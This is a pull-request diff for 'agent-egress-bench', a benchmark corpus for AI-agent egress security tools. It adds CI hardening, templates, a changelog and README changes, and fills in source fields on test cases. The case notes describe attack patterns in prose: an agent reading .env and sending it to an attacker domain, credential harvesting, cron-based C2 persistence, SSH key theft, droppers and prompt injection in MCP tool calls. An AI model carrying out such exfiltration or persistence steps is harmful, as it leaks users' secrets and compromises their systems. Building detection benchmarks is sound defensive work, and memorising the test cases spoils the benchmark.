### PR TITLE
chore: CI hardening, OpenSSF Scorecard, README badges

### DIFF
--- a/.github/ISSUE_TEMPLATE/bug.md
+++ b/.github/ISSUE_TEMPLATE/bug.md
@@ -1,0 +1,13 @@
+---
+name: Bug report
+about: Report an issue with a case, the validator, or documentation
+labels: bug
+---
+
+## What's wrong?
+
+## Which file(s)?
+
+## Expected behavior
+
+## Steps to reproduce

--- a/.github/ISSUE_TEMPLATE/new-case.md
+++ b/.github/ISSUE_TEMPLATE/new-case.md
@@ -1,0 +1,29 @@
+---
+name: New test case
+about: Propose a new attack or benign test case
+labels: new-case
+---
+
+## Category
+
+Which attack surface? (url, request_body, headers, response_fetch, response_mitm, mcp_input, mcp_tool, mcp_chain)
+
+## Description
+
+What does this case test? Why should it exist?
+
+## Expected verdict
+
+`block` or `allow`?
+
+## Attack pattern
+
+Describe the payload. Include the format (URL, JSON body, headers, MCP message, etc.)
+
+## Source
+
+Where does this attack pattern come from? (research paper, real-world incident, tool documentation, CVE, etc.)
+
+## False positive risk
+
+How likely is this pattern to appear in legitimate traffic? (low, medium, high)

--- a/.github/ISSUE_TEMPLATE/new-runner.md
+++ b/.github/ISSUE_TEMPLATE/new-runner.md
@@ -1,0 +1,19 @@
+---
+name: New runner
+about: Add a runner for a security tool
+labels: runner
+---
+
+## Tool name and version
+
+## Tool type
+
+What kind of security tool? (proxy, firewall, MCP wrapper, API gateway, etc.)
+
+## Capabilities
+
+Which capability_tags does your tool claim? (url_dlp, request_body_dlp, header_dlp, response_injection, mcp_input_scan, mcp_tool_poison, mcp_chain, ssrf, domain_blocklist, entropy, encoding_evasion)
+
+## Runner approach
+
+How will the runner feed cases to the tool? (HTTP proxy, CLI invocation, MCP stdio, etc.)

--- a/.github/PULL_REQUEST_TEMPLATE.md
+++ b/.github/PULL_REQUEST_TEMPLATE.md
@@ -1,0 +1,15 @@
+## What
+
+One sentence: what does this PR add or change?
+
+## Why
+
+Why is this needed?
+
+## Checklist
+
+- [ ] Cases validate: `cd validate && go build -o /tmp/aeb-validate . && /tmp/aeb-validate ../cases`
+- [ ] All secrets are obviously fake
+- [ ] Case IDs match filenames
+- [ ] New cases include `description`, `why_expected`, `false_positive_risk`, and `source`
+- [ ] Benign cases have `"safe_example": true`

--- a/.github/workflows/dependency-review.yaml
+++ b/.github/workflows/dependency-review.yaml
@@ -13,10 +13,17 @@ jobs:
     runs-on: ubuntu-latest
     timeout-minutes: 5
     steps:
-      - uses: actions/checkout@v4
+      - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
 
       - name: Dependency Review
-        uses: actions/dependency-review-action@v4
+        uses: actions/dependency-review-action@da24556b548a50705dd671f47852072ea4c105d9 # v4.7.1
         with:
           fail-on-severity: high
+          deny-licenses: >-
+            AGPL-3.0-only,
+            AGPL-3.0-or-later,
+            GPL-2.0-only,
+            GPL-2.0-or-later,
+            GPL-3.0-only,
+            GPL-3.0-or-later
           comment-summary-in-pr: on-failure

--- a/.github/workflows/pipelock.yaml
+++ b/.github/workflows/pipelock.yaml
@@ -21,3 +21,4 @@ jobs:
           scan-diff: 'true'
           fail-on-findings: 'true'
           test-vectors: 'false'
+          exclude-paths: 'cases/'

--- a/.github/workflows/pipelock.yaml
+++ b/.github/workflows/pipelock.yaml
@@ -1,0 +1,23 @@
+name: Pipelock Security Scan
+
+on:
+  pull_request:
+    branches: [main]
+
+permissions:
+  contents: read
+
+jobs:
+  security-scan:
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
+        with:
+          fetch-depth: 0
+
+      - name: Pipelock Scan
+        uses: luckyPipewrench/pipelock@30f8741f3b57e112239b60478e4b0009dbec9815 # v1
+        with:
+          scan-diff: 'true'
+          fail-on-findings: 'true'
+          test-vectors: 'false'

--- a/.github/workflows/scorecard.yaml
+++ b/.github/workflows/scorecard.yaml
@@ -1,0 +1,41 @@
+name: OpenSSF Scorecard
+
+on:
+  branch_protection_rule:
+  workflow_dispatch:
+  schedule:
+    - cron: '0 5 * * 1' # Weekly Monday 5AM UTC
+  push:
+    branches: [main]
+
+permissions: read-all
+
+jobs:
+  analysis:
+    runs-on: ubuntu-latest
+    permissions:
+      security-events: write
+      id-token: write
+    steps:
+      - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
+        with:
+          persist-credentials: false
+
+      - name: Run Scorecard
+        uses: ossf/scorecard-action@4eaacf0543bb3f2c246792bd56e8cdeffafb205a # v2.4.3
+        with:
+          results_file: results.sarif
+          results_format: sarif
+          publish_results: true
+
+      - name: Upload Scorecard results
+        uses: actions/upload-artifact@bbbca2ddaa5d8feaa63e36b76fdaad77386f024f # v7.0.0
+        with:
+          name: scorecard-results
+          path: results.sarif
+          retention-days: 5
+
+      - name: Upload to code-scanning
+        uses: github/codeql-action/upload-sarif@89a39a4e59826350b863aa6b6252a07ad50cf83e # v4
+        with:
+          sarif_file: results.sarif

--- a/.github/workflows/security.yaml
+++ b/.github/workflows/security.yaml
@@ -6,7 +6,11 @@ on:
   pull_request:
     branches: [main]
   schedule:
-    - cron: '0 3 * * 0'
+    - cron: '0 3 * * 0' # Weekly Sunday 3AM UTC
+
+concurrency:
+  group: security-${{ github.ref }}
+  cancel-in-progress: ${{ github.ref != 'refs/heads/main' }}
 
 permissions:
   contents: read
@@ -14,17 +18,18 @@ permissions:
 jobs:
   codeql:
     runs-on: ubuntu-latest
+    timeout-minutes: 10
     permissions:
       security-events: write
       contents: read
     steps:
-      - uses: actions/checkout@v4
+      - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
 
-      - uses: github/codeql-action/init@v3
+      - uses: github/codeql-action/init@89a39a4e59826350b863aa6b6252a07ad50cf83e # v4
         with:
           languages: go
           queries: security-and-quality
 
-      - uses: github/codeql-action/autobuild@v3
+      - uses: github/codeql-action/autobuild@89a39a4e59826350b863aa6b6252a07ad50cf83e # v4
 
-      - uses: github/codeql-action/analyze@v3
+      - uses: github/codeql-action/analyze@89a39a4e59826350b863aa6b6252a07ad50cf83e # v4

--- a/.github/workflows/validate.yaml
+++ b/.github/workflows/validate.yaml
@@ -31,7 +31,7 @@ jobs:
         run: cd validate && go build -o /tmp/aeb-validate .
 
       - name: Validate all cases
-        run: /tmp/aeb-validate cases
+        run: /tmp/aeb-validate cases cases
 
       - name: Check case count
         run: |

--- a/.github/workflows/validate.yaml
+++ b/.github/workflows/validate.yaml
@@ -6,16 +6,21 @@ on:
   pull_request:
     branches: [main]
 
+concurrency:
+  group: validate-${{ github.ref }}
+  cancel-in-progress: ${{ github.ref != 'refs/heads/main' }}
+
 permissions:
   contents: read
 
 jobs:
   validate:
     runs-on: ubuntu-latest
+    timeout-minutes: 10
     steps:
-      - uses: actions/checkout@v4
+      - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
 
-      - uses: actions/setup-go@v5
+      - uses: actions/setup-go@4b73464bb391d4059bd26b0524d20df3927bd417 # v6
         with:
           go-version: "1.24"
 

--- a/.github/workflows/validate.yaml
+++ b/.github/workflows/validate.yaml
@@ -44,8 +44,8 @@ jobs:
 
       - name: Scan for personal information
         run: |
-          if grep -ri 'pipelab\|debserver\|clawdbot\|family-agent\|10\.10\.' \
-            cases/ docs/ examples/ README.md CONTRIBUTING.md CLAUDE.md 2>/dev/null; then
+          if grep -ri 'debserver\|clawdbot\|family-agent\|10\.10\.' \
+            cases/ docs/ examples/ README.md CONTRIBUTING.md 2>/dev/null; then
             echo "ERROR: personal/infrastructure information found in repo content"
             exit 1
           fi

--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -1,0 +1,36 @@
+# Changelog
+
+All notable changes to this project will be documented in this file.
+
+The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.1.0/).
+
+## [Unreleased]
+
+### Added
+
+- 72 test cases across 8 categories: url, request-body, headers, response-fetch, response-mitm, mcp-input, mcp-tool, mcp-chain
+- 56 malicious cases (expected: block) and 16 benign cases (expected: allow)
+- Case spec v1 with payload, expected verdict, capability tags, and requirements
+- Go validator with subcommands: `cases`, `results`, `profile` (stdlib only, no external deps)
+- Reference Pipelock runner in `examples/pipelock/`
+- Runner template skeleton in `examples/runner-template/` for building new runners
+- JSON Schema files for cases, tool profiles, and result lines (`schemas/`)
+- CI pipeline with CodeQL, dependency review, corpus validation, and Pipelock scan
+- OpenSSF Scorecard integration
+- OWASP Agentic Top 10 mapping for all 8 case categories
+- Scoring model documentation (pass/fail/not_applicable/error)
+- Runner output contract and verdict mapping spec
+- Adoption guide for vendors (`docs/ADOPTION.md`)
+- Glossary of key terms (`docs/GLOSSARY.md`)
+- Governance policy covering neutrality, immutability, and contributions (`docs/GOVERNANCE.md`)
+- CONTRIBUTING.md with case authoring guidelines
+- SECURITY.md with vulnerability reporting policy
+- CITATION.cff for academic citation
+- GitHub issue templates (new case, new runner, bug report)
+- Pull request template with validation checklist
+- Source provenance for all 72 case files
+
+### Fixed
+
+- Harness config path and counter logic in Pipelock runner
+- Pipelock runner README: corrected `error` to `not_applicable` for unsupported transports

--- a/CITATION.cff
+++ b/CITATION.cff
@@ -1,0 +1,19 @@
+cff-version: 1.2.0
+title: agent-egress-bench
+message: "If you use this corpus in research, please cite it."
+type: dataset
+authors:
+  - name: Josh Waldrep
+    alias: luckyPipewrench
+repository-code: https://github.com/luckyPipewrench/agent-egress-bench
+license: Apache-2.0
+keywords:
+  - ai-security
+  - agent-security
+  - benchmark
+  - mcp
+  - dlp
+  - prompt-injection
+  - ssrf
+  - exfiltration
+date-released: "2026-03-07"

--- a/CONTRIBUTING.md
+++ b/CONTRIBUTING.md
@@ -10,7 +10,7 @@ Contributions welcome: new test cases, runners for your security tool, documenta
 4. Run the validator:
 
 ```bash
-cd validate && go build -o /tmp/aeb-validate . && /tmp/aeb-validate ../cases
+cd validate && go build -o aeb-validate . && ./aeb-validate ../cases
 ```
 
 ### Requirements for new cases
@@ -42,20 +42,20 @@ Existing case semantics are stable. If you disagree with an expected verdict, op
 
 ## Adding a runner
 
-Create a directory under `examples/{tool-name}/` with:
+Start from the [runner template](examples/runner-template/) for a working skeleton. Create a directory under `examples/{tool-name}/` with:
 
 - A runner script or program
-- A `tool-profile.json` declaring capabilities
+- A `tool-profile.json` declaring capabilities (see [tool profile schema](schemas/tool-profile.schema.json))
 - A README explaining how to run it
 
-Runner output must follow [docs/RUNNER.md](docs/RUNNER.md).
+Runner output must follow [docs/RUNNER.md](docs/RUNNER.md). You can validate your output with `validate results <file.jsonl>` and your profile with `validate profile <file.json>`.
 
 ## Validation
 
 All case files must pass validation before merge:
 
 ```bash
-cd validate && go build -o /tmp/aeb-validate . && /tmp/aeb-validate ../cases
+cd validate && go build -o aeb-validate . && ./aeb-validate ../cases
 ```
 
 CI runs this automatically on every pull request along with CodeQL security analysis and dependency review.
@@ -63,3 +63,5 @@ CI runs this automatically on every pull request along with CodeQL security anal
 ## Governance
 
 This repo is maintained by the Pipelock author. Contributions from any vendor or individual are welcome. This repo does not produce rankings or cross-tool comparisons. Each tool can publish its own results independently.
+
+Full governance policy: [docs/GOVERNANCE.md](docs/GOVERNANCE.md). Vendor adoption guide: [docs/ADOPTION.md](docs/ADOPTION.md).

--- a/README.md
+++ b/README.md
@@ -2,9 +2,11 @@
 
 [![Validate Cases](https://github.com/luckyPipewrench/agent-egress-bench/actions/workflows/validate.yaml/badge.svg)](https://github.com/luckyPipewrench/agent-egress-bench/actions/workflows/validate.yaml)
 [![Security](https://github.com/luckyPipewrench/agent-egress-bench/actions/workflows/security.yaml/badge.svg)](https://github.com/luckyPipewrench/agent-egress-bench/actions/workflows/security.yaml)
+[![Pipelock Scan](https://github.com/luckyPipewrench/agent-egress-bench/actions/workflows/pipelock.yaml/badge.svg)](https://github.com/luckyPipewrench/agent-egress-bench/actions/workflows/pipelock.yaml)
 [![OpenSSF Scorecard](https://api.scorecard.dev/projects/github.com/luckyPipewrench/agent-egress-bench/badge)](https://scorecard.dev/viewer/?uri=github.com/luckyPipewrench/agent-egress-bench)
 [![Go Report Card](https://goreportcard.com/badge/github.com/luckyPipewrench/agent-egress-bench)](https://goreportcard.com/report/github.com/luckyPipewrench/agent-egress-bench)
 [![License](https://img.shields.io/badge/License-Apache_2.0-blue.svg)](https://opensource.org/licenses/Apache-2.0)
+[![Pipelab](https://img.shields.io/badge/Pipelab-pipelab.org-blue)](https://pipelab.org)
 
 A standardized test corpus for evaluating AI agent egress security tools. 72 cases across 8 categories, covering secret exfiltration, prompt injection, SSRF, MCP tool poisoning, and chain detection.
 

--- a/README.md
+++ b/README.md
@@ -48,17 +48,25 @@ Each case is a self-contained JSON file with the attack payload, expected verdic
 
 ## Quick start
 
+**Prerequisites:** [Go 1.24+](https://go.dev/dl/) (stdlib only, no external dependencies).
+
+**Build the validator:**
+
+```bash
+cd validate && go build -o aeb-validate .
+```
+
 **Validate the corpus:**
 
 ```bash
-cd validate && go build -o /tmp/aeb-validate . && /tmp/aeb-validate ../cases
+./aeb-validate ../cases
 ```
 
-**Validate a runner's output or tool profile:**
+**Validate a runner's results or tool profile:**
 
 ```bash
-/tmp/aeb-validate results path/to/results.jsonl
-/tmp/aeb-validate profile path/to/tool-profile.json
+./aeb-validate results path/to/results.jsonl
+./aeb-validate profile path/to/tool-profile.json
 ```
 
 **Run against a tool** (using the Pipelock reference runner as an example):

--- a/README.md
+++ b/README.md
@@ -1,8 +1,25 @@
 # agent-egress-bench
 
+[![Validate Cases](https://github.com/luckyPipewrench/agent-egress-bench/actions/workflows/validate.yaml/badge.svg)](https://github.com/luckyPipewrench/agent-egress-bench/actions/workflows/validate.yaml)
+[![Security](https://github.com/luckyPipewrench/agent-egress-bench/actions/workflows/security.yaml/badge.svg)](https://github.com/luckyPipewrench/agent-egress-bench/actions/workflows/security.yaml)
+[![OpenSSF Scorecard](https://api.scorecard.dev/projects/github.com/luckyPipewrench/agent-egress-bench/badge)](https://scorecard.dev/viewer/?uri=github.com/luckyPipewrench/agent-egress-bench)
+[![Go Report Card](https://goreportcard.com/badge/github.com/luckyPipewrench/agent-egress-bench)](https://goreportcard.com/report/github.com/luckyPipewrench/agent-egress-bench)
+[![License](https://img.shields.io/badge/License-Apache_2.0-blue.svg)](https://opensource.org/licenses/Apache-2.0)
+
 A standardized test corpus for evaluating AI agent egress security tools. 72 cases across 8 categories, covering secret exfiltration, prompt injection, SSRF, MCP tool poisoning, and chain detection.
 
-**This tests the security tool, not the agent.** Every other benchmark in this space (AgentDojo, InjecAgent, CyberSecEval, AgentHarm) tests whether the LLM behaves correctly. This one tests whether the firewall, proxy, or scanner sitting between the agent and the network catches the attack.
+**This tests the security tool, not the agent.** Most benchmarks in this space (AgentDojo, InjecAgent, CyberSecEval, AgentHarm) test whether the LLM behaves correctly. This one tests whether the firewall, proxy, or scanner sitting between the agent and the network catches the attack.
+
+```
+┌─────────────────────┐     ┌──────────────────────┐     ┌──────────┐
+│  AI Agent           │     │  Security Tool        │     │          │
+│  (has secrets,      │────▶│  (proxy / firewall /  │────▶│ Internet │
+│   runs tools)       │     │   MCP wrapper)        │     │          │
+└─────────────────────┘     └──────────────────────┘     └──────────┘
+                                     ▲
+                            agent-egress-bench
+                            tests THIS layer
+```
 
 ## Why this exists
 
@@ -35,6 +52,13 @@ Each case is a self-contained JSON file with the attack payload, expected verdic
 cd validate && go build -o /tmp/aeb-validate . && /tmp/aeb-validate ../cases
 ```
 
+**Validate a runner's output or tool profile:**
+
+```bash
+/tmp/aeb-validate results path/to/results.jsonl
+/tmp/aeb-validate profile path/to/tool-profile.json
+```
+
 **Run against a tool** (using the Pipelock reference runner as an example):
 
 ```bash
@@ -43,6 +67,18 @@ bash harness.sh /path/to/pipelock
 ```
 
 Output is JSONL (one result per case). See [docs/RUNNER.md](docs/RUNNER.md) for the runner contract.
+
+## What this does NOT test
+
+This corpus has a specific scope. It does not cover:
+
+- **Model alignment.** Whether the LLM refuses harmful instructions. Use AgentDojo, AgentHarm, or ASB for that.
+- **Application-layer guardrails.** Whether a guardrail API flags a prompt as malicious. Use AgentShield-benchmark for that.
+- **Code generation safety.** Whether the model writes insecure code. Use CyberSecEval for that.
+- **Authentication or authorization.** Whether the agent has valid credentials for the APIs it calls.
+- **Inbound traffic.** What enters the agent's environment. This corpus focuses on outbound (egress) traffic.
+
+If you need to test the model, use a model benchmark. If you need to test the network security layer, use this.
 
 ## How it works
 
@@ -62,7 +98,7 @@ A runner connects your security tool to this corpus. You need:
 2. A script that feeds each case to your tool and observes the verdict
 3. JSONL output following the format in [docs/RUNNER.md](docs/RUNNER.md)
 
-Put your runner in `examples/{your-tool}/` and open a PR.
+Start from the [runner template](examples/runner-template/) for a working skeleton, or look at the [Pipelock runner](examples/pipelock/) for a complete example. Put your runner in `examples/{your-tool}/` and open a PR. See [docs/ADOPTION.md](docs/ADOPTION.md) for the full guide.
 
 ## OWASP Agentic Top 10 mapping
 
@@ -104,7 +140,11 @@ AgentShield-benchmark is the closest comparable, but operates at the application
 - [SPEC.md](docs/SPEC.md): case schema, field definitions, enums, payload formats
 - [SCORING.md](docs/SCORING.md): pass/fail/not_applicable/error scoring model
 - [RUNNER.md](docs/RUNNER.md): runner output contract and verdict mapping
+- [ADOPTION.md](docs/ADOPTION.md): guide for vendors adopting the benchmark
+- [GLOSSARY.md](docs/GLOSSARY.md): definitions of key terms (agent firewall, egress security, etc.)
+- [GOVERNANCE.md](docs/GOVERNANCE.md): neutrality policy, case immutability, contribution rules
 - [OWASP-MAPPING.md](docs/OWASP-MAPPING.md): case categories mapped to OWASP Agentic Top 10
+- [schemas/](schemas/): JSON Schema files for cases, tool profiles, and results
 
 ## Contributing
 
@@ -117,6 +157,8 @@ See [CONTRIBUTING.md](CONTRIBUTING.md). Cases, runners, and documentation improv
 This corpus was created by the [Pipelock](https://github.com/luckyPipewrench/pipelock) author. Contributions from any vendor or individual are welcome. This repo does not produce rankings or cross-tool comparison tables. Each tool publishes its own results independently.
 
 **Conflict of interest disclosure:** The author builds an agent egress security tool. This corpus was designed to be tool-neutral: cases test observable behavior (did the request get blocked?), not implementation details. The [Pipelock runner](examples/pipelock/) is a reference implementation, not a privileged position.
+
+Full governance policy: [docs/GOVERNANCE.md](docs/GOVERNANCE.md).
 
 ## License
 

--- a/cases/headers/header-benign-cookies-002.json
+++ b/cases/headers/header-benign-cookies-002.json
@@ -24,5 +24,5 @@
   "why_expected": "standard_session_cookies",
   "safe_example": true,
   "notes": "Normal cookies including Google Analytics tracker. None match secret patterns.",
-  "source": ""
+  "source": "Synthetic benign traffic pattern"
 }

--- a/cases/headers/header-benign-standard-003.json
+++ b/cases/headers/header-benign-standard-003.json
@@ -30,5 +30,5 @@
   "why_expected": "standard_browser_headers_no_secrets",
   "safe_example": true,
   "notes": "Typical browser headers including a UUID-format request ID. None of these values match known secret patterns.",
-  "source": ""
+  "source": "Synthetic benign traffic pattern"
 }

--- a/cases/headers/header-dlp-aws-headers-005.json
+++ b/cases/headers/header-dlp-aws-headers-005.json
@@ -23,5 +23,5 @@
   "false_positive_risk": "low",
   "why_expected": "aws_credentials_in_custom_headers",
   "notes": "Both AWS access key ID (AKIA prefix) and secret access key exfiltrated via custom headers. Uses http_proxy transport.",
-  "source": ""
+  "source": "OWASP Agentic Top 10 ASI02; AWS Signature v4 credential format documentation"
 }

--- a/cases/headers/header-dlp-bearer-001.json
+++ b/cases/headers/header-dlp-bearer-001.json
@@ -20,5 +20,5 @@
   "false_positive_risk": "low",
   "why_expected": "aws_key_in_auth_header",
   "notes": "AWS access key format in Authorization header value.",
-  "source": ""
+  "source": "OWASP Agentic Top 10 ASI02; Bearer token format (RFC 6750); AWS access key ID pattern"
 }

--- a/cases/headers/header-dlp-cookie-003.json
+++ b/cases/headers/header-dlp-cookie-003.json
@@ -20,5 +20,5 @@
   "false_positive_risk": "low",
   "why_expected": "github_pat_in_cookie",
   "notes": "GitHub PAT embedded among normal cookie values.",
-  "source": ""
+  "source": "OWASP Agentic Top 10 ASI02; GitHub PAT token format (ghp_ prefix)"
 }

--- a/cases/headers/header-dlp-custom-002.json
+++ b/cases/headers/header-dlp-custom-002.json
@@ -20,5 +20,5 @@
   "false_positive_risk": "low",
   "why_expected": "api_key_in_header",
   "notes": "SendGrid-style API key in a custom header.",
-  "source": ""
+  "source": "OWASP Agentic Top 10 ASI02; SendGrid API key format (SG. prefix)"
 }

--- a/cases/headers/header-dlp-jwt-004.json
+++ b/cases/headers/header-dlp-jwt-004.json
@@ -20,5 +20,5 @@
   "false_positive_risk": "low",
   "why_expected": "jwt_token_in_auth_header",
   "notes": "Complete RS256 JWT token. The signature portion contains high-entropy data that should trigger DLP detection.",
-  "source": ""
+  "source": "OWASP Agentic Top 10 ASI02; JSON Web Token format (RFC 7519); Bearer scheme (RFC 6750)"
 }

--- a/cases/headers/header-dlp-multi-secret-006.json
+++ b/cases/headers/header-dlp-multi-secret-006.json
@@ -23,5 +23,5 @@
   "false_positive_risk": "low",
   "why_expected": "multiple_secrets_in_separate_headers",
   "notes": "GitHub PAT in X-Debug-Token, OpenAI API key in X-Trace-Id, and AWS access key in X-Request-Ref. Tests that DLP scans all header values, not just known headers like Authorization.",
-  "source": ""
+  "source": "OWASP Agentic Top 10 ASI02; multi-header secret spreading evasion technique"
 }

--- a/cases/mcp-chain/mcp-chain-benign-read-write-001.json
+++ b/cases/mcp-chain/mcp-chain-benign-read-write-001.json
@@ -46,5 +46,5 @@
   "safe_example": true,
   "why_expected": "benign_read_write_no_sensitive_no_network",
   "notes": "Benign workflow: read a non-sensitive project file and write a summary in the same directory. No sensitive paths, no credentials, no network access. Should not trigger chain detection.",
-  "source": ""
+  "source": "Synthetic benign traffic pattern"
 }

--- a/cases/mcp-chain/mcp-chain-env-network-002.json
+++ b/cases/mcp-chain/mcp-chain-env-network-002.json
@@ -35,5 +35,5 @@
   "false_positive_risk": "medium",
   "why_expected": "env_then_network_pattern",
   "notes": "Agent harvests environment credentials then exfiltrates via HTTP. The env-then-network pattern is a strong exfiltration signal.",
-  "source": ""
+  "source": "OWASP ASI02 + ASI08; multi-step exfiltration sequence, environment credential harvest then network send"
 }

--- a/cases/mcp-chain/mcp-chain-exfil-001.json
+++ b/cases/mcp-chain/mcp-chain-exfil-001.json
@@ -35,5 +35,5 @@
   "false_positive_risk": "medium",
   "why_expected": "read_sensitive_then_fetch_pattern",
   "notes": "Classic read-then-exfiltrate pattern: read .env file, then fetch to attacker domain.",
-  "source": ""
+  "source": "OWASP ASI02 + ASI08; multi-step exfiltration sequence, read sensitive file then fetch"
 }

--- a/cases/mcp-chain/mcp-chain-persist-callback-006.json
+++ b/cases/mcp-chain/mcp-chain-persist-callback-006.json
@@ -38,5 +38,5 @@
   "false_positive_risk": "low",
   "why_expected": "persist_then_callback_pattern",
   "notes": "Persistence chain: install a cron job that periodically fetches and executes remote commands, then notify the C2 server that the implant is active. Writing to crontab paths followed by outbound HTTP is a strong persistence indicator.",
-  "source": ""
+  "source": "OWASP ASI02 + ASI08; multi-step persistence sequence, crontab write then C2 callback"
 }

--- a/cases/mcp-chain/mcp-chain-read-write-send-005.json
+++ b/cases/mcp-chain/mcp-chain-read-write-send-005.json
@@ -47,5 +47,5 @@
   "false_positive_risk": "low",
   "why_expected": "read_stage_exfiltrate_pattern",
   "notes": "Three-step exfiltration: read sensitive file, stage to /tmp, then send externally. The staging step attempts to evade two-step chain detectors by inserting an intermediate write between the sensitive read and the network call.",
-  "source": ""
+  "source": "OWASP ASI02 + ASI08; multi-step exfiltration sequence, read-stage-exfiltrate with intermediate file"
 }

--- a/cases/mcp-chain/mcp-chain-recon-read-004.json
+++ b/cases/mcp-chain/mcp-chain-recon-read-004.json
@@ -44,5 +44,5 @@
   "false_positive_risk": "medium",
   "why_expected": "directory_scan_then_read_sensitive_pattern",
   "notes": "Reconnaissance chain: enumerate directories to discover user accounts and SSH key locations, then read the private key. The progressive narrowing from /home to .ssh to id_rsa is a strong recon signal.",
-  "source": ""
+  "source": "OWASP ASI02 + ASI08; multi-step reconnaissance sequence, directory enumeration then SSH key theft"
 }

--- a/cases/mcp-chain/mcp-chain-shell-burst-007.json
+++ b/cases/mcp-chain/mcp-chain-shell-burst-007.json
@@ -53,5 +53,5 @@
   "false_positive_risk": "low",
   "why_expected": "shell_burst_command_spray_pattern",
   "notes": "Shell burst: rapid sequence of system enumeration commands followed by exfiltration. The pattern of whoami, passwd read, root listing, then curl to an external host is a textbook post-compromise enumeration and exfil chain.",
-  "source": ""
+  "source": "OWASP ASI02 + ASI08; multi-step exfiltration sequence, rapid shell command spray with data exfil"
 }

--- a/cases/mcp-chain/mcp-chain-write-execute-003.json
+++ b/cases/mcp-chain/mcp-chain-write-execute-003.json
@@ -38,5 +38,5 @@
   "false_positive_risk": "low",
   "why_expected": "write_then_execute_pattern",
   "notes": "Classic dropper: write a script to /tmp then execute it. The write-execute sequence is a strong indicator of staged payload delivery.",
-  "source": ""
+  "source": "OWASP ASI02 + ASI08; multi-step exfiltration sequence, write-then-execute dropper pattern"
 }

--- a/cases/mcp-input/mcp-benign-normal-call-001.json
+++ b/cases/mcp-input/mcp-benign-normal-call-001.json
@@ -32,5 +32,5 @@
   "why_expected": "normal_file_read_of_safe_path",
   "safe_example": true,
   "notes": "Normal MCP tool call to read a README. No secrets, no injection.",
-  "source": ""
+  "source": "Synthetic benign traffic pattern"
 }

--- a/cases/mcp-input/mcp-input-base64-secret-004.json
+++ b/cases/mcp-input/mcp-input-base64-secret-004.json
@@ -29,5 +29,5 @@
   "false_positive_risk": "low",
   "why_expected": "base64_encoded_aws_key_in_tool_args",
   "notes": "The base64 payload decodes to a string resembling an AWS key ID pattern (AKI prefix). Tests whether DLP decodes base64 before pattern matching.",
-  "source": ""
+  "source": "OWASP Agentic Top 10 ASI02; MCP tool argument exfiltration via base64 encoding evasion"
 }

--- a/cases/mcp-input/mcp-input-dlp-001.json
+++ b/cases/mcp-input/mcp-input-dlp-001.json
@@ -28,5 +28,5 @@
   "false_positive_risk": "low",
   "why_expected": "aws_key_in_tool_arguments",
   "notes": "AWS access key embedded in a web search query tool argument.",
-  "source": ""
+  "source": "OWASP Agentic Top 10 ASI02; MCP tool argument exfiltration"
 }

--- a/cases/mcp-input/mcp-input-env-leak-003.json
+++ b/cases/mcp-input/mcp-input-env-leak-003.json
@@ -30,5 +30,5 @@
   "false_positive_risk": "low",
   "why_expected": "env_var_dump_with_secrets_in_tool_args",
   "notes": "Multiple sensitive environment variables (database URL with password, AWS secret key, Stripe key) are dumped into a message body. All secrets are obviously fake/example values.",
-  "source": ""
+  "source": "OWASP Agentic Top 10 ASI02; MCP tool argument exfiltration of environment variables"
 }

--- a/cases/mcp-input/mcp-input-hex-apikey-008.json
+++ b/cases/mcp-input/mcp-input-hex-apikey-008.json
@@ -30,5 +30,5 @@
   "false_positive_risk": "medium",
   "why_expected": "hex_encoded_github_token_in_tool_args",
   "notes": "The hex string decodes to a string starting with 'ghp_EXAMPLETOKEN...' matching the GitHub PAT pattern. Tests whether DLP decodes hex before pattern matching.",
-  "source": ""
+  "source": "OWASP Agentic Top 10 ASI02; MCP tool argument exfiltration via hex encoding evasion"
 }

--- a/cases/mcp-input/mcp-input-injection-002.json
+++ b/cases/mcp-input/mcp-input-injection-002.json
@@ -29,5 +29,5 @@
   "false_positive_risk": "medium",
   "why_expected": "injection_pattern_in_tool_args",
   "notes": "Prompt injection embedded in file content being written via MCP tool.",
-  "source": ""
+  "source": "OWASP Agentic Top 10 ASI02; prompt injection embedded in MCP tool arguments"
 }

--- a/cases/mcp-input/mcp-input-jwt-url-007.json
+++ b/cases/mcp-input/mcp-input-jwt-url-007.json
@@ -29,5 +29,5 @@
   "false_positive_risk": "low",
   "why_expected": "jwt_token_in_url_query_parameter",
   "notes": "A JWT (the well-known jwt.io example token) is passed as a URL query parameter. DLP should detect the three-part base64url.base64url.base64url JWT pattern.",
-  "source": ""
+  "source": "OWASP Agentic Top 10 ASI02; MCP tool argument exfiltration of JWT token via URL parameter"
 }

--- a/cases/mcp-input/mcp-input-scattered-secret-005.json
+++ b/cases/mcp-input/mcp-input-scattered-secret-005.json
@@ -32,5 +32,5 @@
   "false_positive_risk": "medium",
   "why_expected": "aws_key_scattered_across_multiple_fields",
   "notes": "The key AKIAIOSFODNN7EXAMPLE is split into three separate parameters. Tests whether DLP concatenates or cross-correlates fields before scanning.",
-  "source": ""
+  "source": "OWASP Agentic Top 10 ASI02; MCP tool argument exfiltration via secret splitting across parameters"
 }

--- a/cases/mcp-input/mcp-input-ssh-key-006.json
+++ b/cases/mcp-input/mcp-input-ssh-key-006.json
@@ -29,5 +29,5 @@
   "false_positive_risk": "low",
   "why_expected": "ssh_private_key_in_file_write_args",
   "notes": "An SSH private key (fake, obviously synthetic base64 content) is being written to a world-readable temp directory. DLP should flag the BEGIN OPENSSH PRIVATE KEY marker.",
-  "source": ""
+  "source": "OWASP Agentic Top 10 ASI02; MCP tool argument exfiltration of SSH private key"
 }

--- a/cases/mcp-tool/mcp-tool-benign-verbose-001.json
+++ b/cases/mcp-tool/mcp-tool-benign-verbose-001.json
@@ -70,5 +70,5 @@
   "false_positive_risk": "medium",
   "why_expected": "verbose_but_legitimate_tool_description",
   "notes": "Tests that verbose tool descriptions with technical jargon, usage examples, and caveats are not falsely flagged as poisoned. Important for avoiding false positives on real-world MCP servers that include detailed documentation in tool descriptions.",
-  "source": ""
+  "source": "Synthetic benign traffic pattern"
 }

--- a/cases/mcp-tool/mcp-tool-exfil-description-005.json
+++ b/cases/mcp-tool/mcp-tool-exfil-description-005.json
@@ -29,5 +29,5 @@
   "false_positive_risk": "low",
